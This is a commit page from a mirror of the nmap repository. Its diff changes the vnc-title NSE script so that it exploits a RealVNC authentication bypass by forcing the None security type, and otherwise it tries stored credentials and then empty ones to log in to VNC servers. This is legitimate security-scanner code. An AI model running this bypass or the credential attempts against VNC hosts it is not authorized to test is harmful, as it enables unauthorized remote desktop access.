PenTest/nmap
1
0
Fork 0
mirror of https://github.com/nmap/nmap.git synced 2025-12-15 04:09:01 +00:00
Code Issues Projects Releases Wiki Activity

Allow vnc-title to exploit RealVNC auth bypass if discovered.

Browse Source
This commit is contained in:
dmiller
2017-03-03 19:39:57 +00:00
parent 2a5b23f025
commit 76f7c48c17
1 changed files with 45 additions and 15 deletions
Download Patch File Download Diff File Expand all files Collapse all files

60
scripts/vnc-title.nse
View File

@@ -13,6 +13,9 @@ license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"intrusive", "discovery"} categories = {"intrusive", "discovery"}
--- ---
-- @see vnc-brute
-- @see realvnc-auth-bypass
--
-- @output -- @output
-- | vnc-title: -- | vnc-title:
-- | name: LibVNCServer -- | name: LibVNCServer
@@ -24,7 +27,7 @@ categories = {"intrusive", "discovery"}
-- <elem key="geometry">1024 x 768</elem> -- <elem key="geometry">1024 x 768</elem>
-- <elem key="color_depth">24</elem> -- <elem key="color_depth">24</elem>
dependencies = {"vnc-brute"} dependencies = {"vnc-brute", "realvnc-auth-bypass"}
portrule = shortport.port_or_service( {5900, 5901, 5902} , "vnc", "tcp", "open") portrule = shortport.port_or_service( {5900, 5901, 5902} , "vnc", "tcp", "open")
@@ -42,25 +45,52 @@ action = function(host, port)
status, data = v:handshake() status, data = v:handshake()
if ( not(status) ) then return fail(data) end if ( not(status) ) then return fail(data) end
local c = creds.Credentials:new(creds.ALL_DATA, host, port) -- If this doesn't work, start over.
local tried = 0 status = false
for cred in c:getCredentials(creds.State.VALID + creds.State.PARAM) do local reg = host.registry["realvnc-auth-bypass"]
tried = tried + 1 if reg and reg[port.number] then
stdnse.debug1("Trying creds: %s:%s", cred.user, cred.pass) stdnse.debug1("Trying RealVNC Auth Bypass")
status, data = v:login(cred.user, cred.pass) -- Force None auth type and try to init to exploit
v:sendSecType(vnc.VNC.sectypes.NONE)
status, data = v:login_none()
if status then if status then
break status, data = v:client_init(true)
if not status then
stdnse.debug1("RealVNC Auth Bypass failed.")
end
end
if not status then
-- clean up and start over
v:disconnect()
status, data = v:connect()
if not status then return fail(data) end
status, data = v:handshake()
if not status then return fail(data) end
-- Be sure to let the regular login stuff have a try
status = false
end end
end end
if tried < 1 then
--worth trying a None-type login
stdnse.debug1("Trying empty creds, for None security type")
status, data = v:login("", "")
end
if not status then if not status then
return fail(("Couldn't log in: %s"):format(data)) local c = creds.Credentials:new(creds.ALL_DATA, host, port)
local tried = 0
for cred in c:getCredentials(creds.State.VALID + creds.State.PARAM) do
tried = tried + 1
stdnse.debug1("Trying creds: %s:%s", cred.user, cred.pass)
status, data = v:login(cred.user, cred.pass)
if status then
break
end
end
if tried < 1 then
--worth trying a None-type login
stdnse.debug1("Trying empty creds, for None security type")
status, data = v:login("", "")
end
if not status then
return fail(("Couldn't log in: %s"):format(data))
end
status, data = v:client_init(true)
end end
status, data = v:client_init(true)
if status then if status then
local out = stdnse.output_table() local out = stdnse.output_table()
out.name = data.name out.name = data.name